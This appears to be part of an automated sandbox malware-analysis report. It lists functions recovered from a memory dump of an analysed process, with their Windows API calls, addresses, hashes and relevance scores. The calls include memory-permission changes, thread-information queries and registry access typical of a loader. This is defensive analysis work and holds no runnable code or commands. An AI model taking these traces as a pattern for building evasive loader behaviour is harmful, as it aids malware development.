GetLastError.KERNEL32(?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AEC5
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AF5D
SetEvent.KERNEL32(?,03031CA7,00000000,00000000,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302AFF3
RtlAllocateHeap.NTDLL(00000000,00000043,03031CA7), ref: 0302B008
wsprintfA.USER32 ref: 0302B038

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateHeap$Handle$CloseEventOpen$CreateErrorLastLibraryLoadModuleMutexNameProcessUserVersionmemcpymemsetwsprintf
String ID:
API String ID: 3174139447-0
Opcode ID: 0cb19d63885bd3e7e5771c9318ea8cd0f79eee1ca814506418678025e4d7d307
Instruction ID: f895dc98e08e44afdad70e9a1f648e609a79794e5e34e6d5b94ae6b897f8e19f
Opcode Fuzzy Hash: 0cb19d63885bd3e7e5771c9318ea8cd0f79eee1ca814506418678025e4d7d307
Instruction Fuzzy Hash: 0DC1D3F8607314DFC760FF69EA4491ABBECFB85600B148D6EE456C7214CB3AA644CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03036924 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03029BBB: GetLastError.KERNEL32(?,00000000,03043050,?,03025124,?), ref: 03029BE8
Part of subcall function 03029BBB: VirtualQuery.KERNEL32(?,03043050,-66ADDD80,?,00000000,03043050,?,03025124,?), ref: 03029BFF

GetLastError.KERNEL32(00000000,00000004,03043050,?,80000000,00000000,?,030440B0,0000001C,03030691,00000002,?,00000001,?,03047A30,?), ref: 03036A7F

Part of subcall function 0303586B: lstrlen.KERNEL32(?,?,03025124,?), ref: 030358A3
Part of subcall function 0303586B: lstrcpy.KERNEL32(00000000,?), ref: 030358BA
Part of subcall function 0303586B: StrChrA.SHLWAPI(00000000,0000002E), ref: 030358C3
Part of subcall function 0303586B: GetModuleHandleA.KERNEL32(00000000), ref: 030358E1

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000001,00000000,00000004,03043050,?,80000000), ref: 030369FC
VirtualProtect.KERNEL32(00000006,00000004,03043050,03043050,?,00000001,00000000,00000004,03043050,?,80000000,00000000,?,030440B0,0000001C,03030691), ref: 03036A17
RtlEnterCriticalSection.NTDLL(03048420), ref: 03036A3C
RtlLeaveCriticalSection.NTDLL(03048420), ref: 03036A5A

Part of subcall function 03029BBB: SetLastError.KERNEL32(?,?,00000000,03043050,?,03025124,?), ref: 03029C2D

Strings

, xrefs: 030369EB

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastVirtual$CriticalProtectSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 11654437-3916222277
Opcode ID: 336987c45ca7720b2d4c0cc5c255dcab720e617c78e1ca93c7fd24307be7d446
Instruction ID: 94f732469a6b957f16e0fffb26d3f7daad947d678851e1bd118613831307c945
Opcode Fuzzy Hash: 336987c45ca7720b2d4c0cc5c255dcab720e617c78e1ca93c7fd24307be7d446
Instruction Fuzzy Hash: B8417FB9902619EFCB10DF58C988A9DBBF8FF49310F04C159E915AB250D375DA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03029425 Relevance: 9.2, APIs: 6, Instructions: 165
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32(03044100,00000038,03031D8D,00000000,030430EC,0302AE6D,?,00000000,?,?,0302DA8B,?,?,?), ref: 03029436
StrChrA.SHLWAPI(00000000,00000020,?,00000000,?,?,0302DA8B,?,?,?), ref: 03029447
StrStrA.SHLWAPI(00000000,?,?,00000000,?,?,0302DA8B,?,?,?), ref: 03029463

Part of subcall function 03034721: lstrlen.KERNEL32(0304706E,030483D0,0304706E,00000000,0303EF9E), ref: 0303472A
Part of subcall function 03034721: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0303474D
Part of subcall function 03034721: memset.NTDLL ref: 0303475C

ExitProcess.KERNEL32 ref: 03029629

Part of subcall function 03026018: StrTrimA.SHLWAPI(00000000,03043FCC,00000000,?,?,?,03024B4B,?,0000002C,?), ref: 0302605C

VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,00000000,?,?,0302DA8B,?,?,?), ref: 030294CD

Part of subcall function 0302BD76: GetLastError.KERNEL32(000000FF,00000008,030483D0,000000FF,03048164,?,?,0303F562,0000003A,03048164,?,?,?,030332F0,00000001,00000000), ref: 0302BDB6
Part of subcall function 0302BD76: CloseHandle.KERNEL32(000000FF,?,?,0303F562,0000003A,03048164,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0302BDC1

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302953F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Virtual$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
String ID:
API String ID: 750373532-0
Opcode ID: f6b601f383f2fbdcba6ac3a9af4772f3452fb238e65e98e82d24702cbe02e969
Instruction ID: 1af53204bed509cae9a17397ccaf8107b8da07093a81c4c2ffe80a3d6e2c2e5b
Opcode Fuzzy Hash: f6b601f383f2fbdcba6ac3a9af4772f3452fb238e65e98e82d24702cbe02e969
Instruction Fuzzy Hash: 7651ABB5A02228AFDF50EBA4CC48EEEBFB9BF49700F084469F105FA154D7359A51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03028A7E Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

lstrcpy.KERNEL32(?,00000020), ref: 03028B7B
lstrcat.KERNEL32(?,00000020), ref: 03028B90
lstrcmp.KERNEL32(00000000,?), ref: 03028BA7
lstrlen.KERNEL32(?), ref: 03028BCB

Strings

, xrefs: 03028B14

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 2e8eb97773a5debed6e46c3799f8e817c52de5f325dc21b9e84835dab49ad3c6
Instruction ID: beba6282f46046f2505965d0669ad603fb351c531773478d73b5e36452f64f95
Opcode Fuzzy Hash: 2e8eb97773a5debed6e46c3799f8e817c52de5f325dc21b9e84835dab49ad3c6
Instruction Fuzzy Hash: C0519079A02228EBDF21CF99C4846ADFFF6FF55314F19C05AE824AB201C770AA11CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03037CC5 Relevance: 7.6, APIs: 5, Instructions: 109
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,030215C8,?,?), ref: 03037CD2

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,030215C8,?,?), ref: 03037CFB
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,030215C8,?,?), ref: 03037D43
LoadLibraryW.KERNELBASE(-0000FFFE,?,?,?,?,030215C8,?,?), ref: 03037D46
FreeLibrary.KERNEL32(00000000,?,?,?,?,030215C8,?,?), ref: 03037E0A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CurrentDirectoryLibrary$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3371844678-0
Opcode ID: 700e54e03fb260b96692704e6c345170c220e01b0fd136c1b165b48da1ee0ccc
Instruction ID: 256b1f45f7490d173c56500f006cd372e3daf48b2ec38af5088745ec8e8a1a2a
Opcode Fuzzy Hash: 700e54e03fb260b96692704e6c345170c220e01b0fd136c1b165b48da1ee0ccc
Instruction Fuzzy Hash: 53317EF550320BAFE711EF69ED84D66BBECEF09240B048526E905C7251EB79DA10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303BB46 Relevance: 7.5, APIs: 5, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB67
GetProcAddress.KERNEL32(00000000,?), ref: 0303BB80
OpenProcess.KERNEL32(00000400,00000000,0303DA64,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BB9D
IsWow64Process.KERNEL32(00000000,00000000,03048190,?,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBAE
FindCloseChangeNotification.KERNELBASE(00000000,?,?,0303DA64,00000000,03048190,?,00000000), ref: 0303BBC1

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID:
API String ID: 1712524627-0
Opcode ID: a05ceb2709c2a6ed615cf70a9a59d93d6d0c99221c953c594818462a1267a799
Instruction ID: b3695060abbd0b1fde3ee760800d3e42d97217ce7830c4ad79aa73994cb72239
Opcode Fuzzy Hash: a05ceb2709c2a6ed615cf70a9a59d93d6d0c99221c953c594818462a1267a799
Instruction Fuzzy Hash: 4C01D2F9903604EFDB11FF69DA4889ABBFCFB86344714866AE501D3208E7755701CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302C2B8 Relevance: 4.6, APIs: 3, Instructions: 71
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32(00000000,?), ref: 0302C2E9
RtlExitUserThread.NTDLL(00000000), ref: 0302C2FC
HeapFree.KERNEL32(00000000,?,?,00000000,?,?), ref: 0302C396

Part of subcall function 0303A4E7: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0303A512
Part of subcall function 0303A4E7: wsprintfA.USER32 ref: 0303A534
Part of subcall function 0303A4E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0303A565

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$AllocateExitThreadUserwsprintf
String ID:
API String ID: 4270082786-0
Opcode ID: bc9dc021fe51bf32ae1af3f633b52a26aacae2fc1bd8f60a51cdc4c704febe84
Instruction ID: 4b665fe4416d85df2e1ec76d45d3040bdbd52d40c3d2567e576f285d6f417744
Opcode Fuzzy Hash: bc9dc021fe51bf32ae1af3f633b52a26aacae2fc1bd8f60a51cdc4c704febe84
Instruction Fuzzy Hash: 3621AEBA602211BFD711EBA8DD84EDE7BACEB89310F044965F50597260DB74AE01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0302DCFB Relevance: 4.6, APIs: 3, Instructions: 67
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0303F514: RegCreateKeyA.ADVAPI32(80000001,03048164,030483D0), ref: 0303F529
Part of subcall function 0303F514: lstrlen.KERNEL32(03048164,00000000,00000000,0304706E,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0303F552

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0302DD47
HeapFree.KERNEL32(00000000,00000001,?,?,?,0302508A,?,?,?,?,?,00000001), ref: 0302DD7D
RegCloseKey.KERNELBASE(?,?,?,?,0302508A,?,?,?,?,?,00000001), ref: 0302DD8B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 2798709597-0
Opcode ID: c98b71d7584b66f1c69d0347472dd4b7163b940a729849f2c5f06a0e3d0bf5db
Instruction ID: 89610e469a28d389d9ec351a2d5cb52a96fee1925b25d64dac8d01768c3f2961
Opcode Fuzzy Hash: c98b71d7584b66f1c69d0347472dd4b7163b940a729849f2c5f06a0e3d0bf5db
Instruction Fuzzy Hash: C5116DBA501259FFDF02EF94DD84CAE7FBEFB88250B144466F91193110E7319E51AB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303F514 Relevance: 4.5, APIs: 3, Instructions: 40
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,03048164,030483D0), ref: 0303F529
RegOpenKeyA.ADVAPI32(80000001,03048164,030483D0), ref: 0303F533
lstrlen.KERNEL32(03048164,00000000,00000000,0304706E,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0303F552

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: f4e44d5e47eb5d039c4d8c4de59bbba4ccfe50891f7df69db21aacbc3e7fb636
Instruction ID: 55a24e9c87aa940fbbe662c2bafbfb33c25f9095f800d04cfe18c8a3fc450545
Opcode Fuzzy Hash: f4e44d5e47eb5d039c4d8c4de59bbba4ccfe50891f7df69db21aacbc3e7fb636
Instruction Fuzzy Hash: 9AF062BA501209BFE711EF94DC88FEA7BACEF46794F108156FA46C5244E7709680C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03031D14 Relevance: 3.1, APIs: 2, Instructions: 86
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,030430EC,0302AE6D,?,00000000,?,?,0302DA8B,?,?,?), ref: 03031DD1
WaitForSingleObject.KERNEL32(?,00000000,00000000,030430EC,0302AE6D,?,00000000,?,?,0302DA8B,?,?,?), ref: 03031DF5

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: d9eecbd23183d106ed2afadc6929f66fe9446a30187d1adc86c42bab3c30c39f
Instruction ID: 598e66af1e18c6a57fe5c30c38b82135041be33203b781af60b2df9b3c026782
Opcode Fuzzy Hash: d9eecbd23183d106ed2afadc6929f66fe9446a30187d1adc86c42bab3c30c39f
Instruction Fuzzy Hash: 2321C1FD6032515FCBACFF58C6C89BDA2ED964F2043180D66D515CB224CB2A8D418752

Uniqueness

Uniqueness Score: -1.00%

Function 030332BD Relevance: 3.1, APIs: 2, Instructions: 81
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0303F514: RegCreateKeyA.ADVAPI32(80000001,03048164,030483D0), ref: 0303F529
Part of subcall function 0303F514: lstrlen.KERNEL32(03048164,00000000,00000000,0304706E,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0303F552

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,03047DA8,03047068,0303C4FB,00000001,00000000,030483D0,0304706E,00000000,03047DA8,0303EF5B,030483D0,00000000,00000000), ref: 03033311
RegCloseKey.ADVAPI32(?), ref: 0303335E

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: 7d4f4a6e588b1861261418bd041ac34aabb6fe841679e80e6c039de73f86a015
Instruction ID: e89819c8b83283ce8ead65b35caca6abc66549380d7dda909ee1875a9ab8d6ea
Opcode Fuzzy Hash: 7d4f4a6e588b1861261418bd041ac34aabb6fe841679e80e6c039de73f86a015
Instruction Fuzzy Hash: 11318FB9C03218EFDB61EF94D984A9EBBFCEB05B10F1484AAE414A3244D7349B44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0303915C Relevance: 3.1, APIs: 2, Instructions: 54
memorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,03047BD8,?,00000000,030481A8,00000000,0302AE17), ref: 03039199
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,0302AE17,?,00000000), ref: 030391FA

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: f1fb774122b6838ef66e719e5aa611763e9fc1e6f348bb520a6e3d85d2c3c367
Instruction ID: aef6964976cacc46ba8e334830328eaddd3a95b1488bc16d290bc508d76866b1
Opcode Fuzzy Hash: f1fb774122b6838ef66e719e5aa611763e9fc1e6f348bb520a6e3d85d2c3c367
Instruction Fuzzy Hash: 2E113AFA902208EBDF00EBA8DA44BDEB7FCAB09205F104596A501E6144D778AB44DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0302417A Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0304807C), ref: 0302418F

Part of subcall function 0303D196: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0303D1C1
Part of subcall function 0303D196: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0303D1CE
Part of subcall function 0303D196: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0303D25A
Part of subcall function 0303D196: GetModuleHandleA.KERNEL32(00000000), ref: 0303D265
Part of subcall function 0303D196: RtlImageNtHeader.NTDLL(00000000), ref: 0303D26E
Part of subcall function 0303D196: RtlExitUserThread.NTDLL(00000000), ref: 0303D283

InterlockedDecrement.KERNEL32(0304807C), ref: 030241B3

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 512dd060803a96b32ac6c147773759f79e4bce9974b1532489be36ad2e5b473c
Instruction ID: 06b22f6480375c1c35bdb9bf6a897d58973350464da72cbabaaade24e2d5c57e
Opcode Fuzzy Hash: 512dd060803a96b32ac6c147773759f79e4bce9974b1532489be36ad2e5b473c
Instruction Fuzzy Hash: 84E09275797331A7C7A5EA7BDD48B5EBE96AF64F40F048A25F684C8004C320C810C792

Uniqueness

Uniqueness Score: -1.00%

Function 03029525 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302953F

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

ExitProcess.KERNEL32 ref: 03029629

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Free$ExitHeapProcessVirtual
String ID:
API String ID: 909375301-0
Opcode ID: 2d5849966860e9c9079e61e23509124cb4aa4351cccc43d688cfb11dd80b877a
Instruction ID: babb95388accd59734f50531048fd66e6de04315cb4aeee0632ad20b39041476
Opcode Fuzzy Hash: 2d5849966860e9c9079e61e23509124cb4aa4351cccc43d688cfb11dd80b877a
Instruction Fuzzy Hash: FCE092B8D42309EBCB50ABA4DE45ADDFB71BF08710F209250E661761E4C7352A219F60

Uniqueness

Uniqueness Score: -1.00%

Function 0303EB26 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,03047BD8,03043060,00000000,0302AE06,?,00000000,?,?,0302DA8B,?,?,?), ref: 0303EB3B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 50be50e6a6e1f111bd390f4b4bf16f4e7dd5b52431950dff26ed81bbbc54c70e
Instruction ID: 9c890d1cee8da9005a26395a750d5e041397b5708dbe45dbedb4ca061793dcd4
Opcode Fuzzy Hash: 50be50e6a6e1f111bd390f4b4bf16f4e7dd5b52431950dff26ed81bbbc54c70e
Instruction Fuzzy Hash: 223183B6A03214EFCB51EF9CD58499EB7FCFB85610F1489AAD201AB200C330AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303CCCC Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,030479E8,-0000000C,?,?,?,0302EDB1,00000006,?,03043050,?,03025124,?), ref: 0303CD07

Part of subcall function 03038E68: NtQueryInformationProcess.NTDLL(00000000,03025124,00000018,00000000,03048420), ref: 03038E7F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 53054ceb0dfc6d8ca5eb1ecea6e44501583667f5ed3a69f974a3b093ea48c3f9
Instruction ID: 487c51283aec54cbc3f051204ef34e0cbeffa68f3623e1568135e108a14c5397
Opcode Fuzzy Hash: 53054ceb0dfc6d8ca5eb1ecea6e44501583667f5ed3a69f974a3b093ea48c3f9
Instruction Fuzzy Hash: DC21D235602248AFEB70CF59C980EB9BBEDEF46B90B5D442AF945EB110D770E910CB20

Uniqueness

Uniqueness Score: -1.00%

Function 030423F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2ac6d622f333b81c19eeaa91d7730f74c25b6ce49a9d56feff3f2c8a05cc62f6
Instruction ID: 84c0491ebfb54443daf435af8745d50eb5d7d65f53c3a3a577ac75cad2215d3a
Opcode Fuzzy Hash: 2ac6d622f333b81c19eeaa91d7730f74c25b6ce49a9d56feff3f2c8a05cc62f6
Instruction Fuzzy Hash: 2EB092DD26F1006C2048D14B9E01F3A019CC0C09123204ABAB420C8001F5800B8100B5

Uniqueness

Uniqueness Score: -1.00%

Function 03042211 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: cf42891fa79af733a5314b1f54486de7f8b4a23475ce511eaf4dc18960e50a2b
Instruction ID: 8827778b92298db499fa0463e680c8a984073d905bec0fd471e93e9f07c5c178
Opcode Fuzzy Hash: cf42891fa79af733a5314b1f54486de7f8b4a23475ce511eaf4dc18960e50a2b
Instruction Fuzzy Hash: 6EB012D935B1406C3018D24F9E12E3F018CC4D5E11320897EF520CD011F5404F8102B1

Uniqueness

Uniqueness Score: -1.00%

Function 0304222F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: fa6c95562c4f0e8e2062126d81d7e450111ac000fe459ae8535b71996976f328
Instruction ID: 3a025fbf85994f748ef25f653704d49b5dc83b361a883af9235469447717484a
Opcode Fuzzy Hash: fa6c95562c4f0e8e2062126d81d7e450111ac000fe459ae8535b71996976f328
Instruction Fuzzy Hash: B7B012D936B1846C300CD14F9D12E7F02BCC4D5E11320893AF424C9011F5404F840071

Uniqueness

Uniqueness Score: -1.00%

Function 03042239 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 28e17870f36c70dc4282cbf5c086c47715c3cb6a521eaf2a8ae110ee3668f6fd
Instruction ID: 4dc73b43eb781cd8f03577431c61e42183891c2b21bf1d3aaf3f3537415df793
Opcode Fuzzy Hash: 28e17870f36c70dc4282cbf5c086c47715c3cb6a521eaf2a8ae110ee3668f6fd
Instruction Fuzzy Hash: D1B012D936B1406C305CE14F9D12E3F019CC4D5E113304D3AF020C9051F5404F800071

Uniqueness

Uniqueness Score: -1.00%

Function 0304224D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f5b1f469b4c922ade578fcf4a3df3d385cee0483affd6c9c9d6e54a7fa2bb157
Instruction ID: 92d8a90853e54dccd6f1e385b90a6d8ab416a40f0a8de3a76b0d9c13754fb17d
Opcode Fuzzy Hash: f5b1f469b4c922ade578fcf4a3df3d385cee0483affd6c9c9d6e54a7fa2bb157
Instruction Fuzzy Hash: F1B012D936B1807C304CD14F9D12E3F019CC4D5E153204D3AF020C9011F5404F800071

Uniqueness

Uniqueness Score: -1.00%

Function 030421B7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
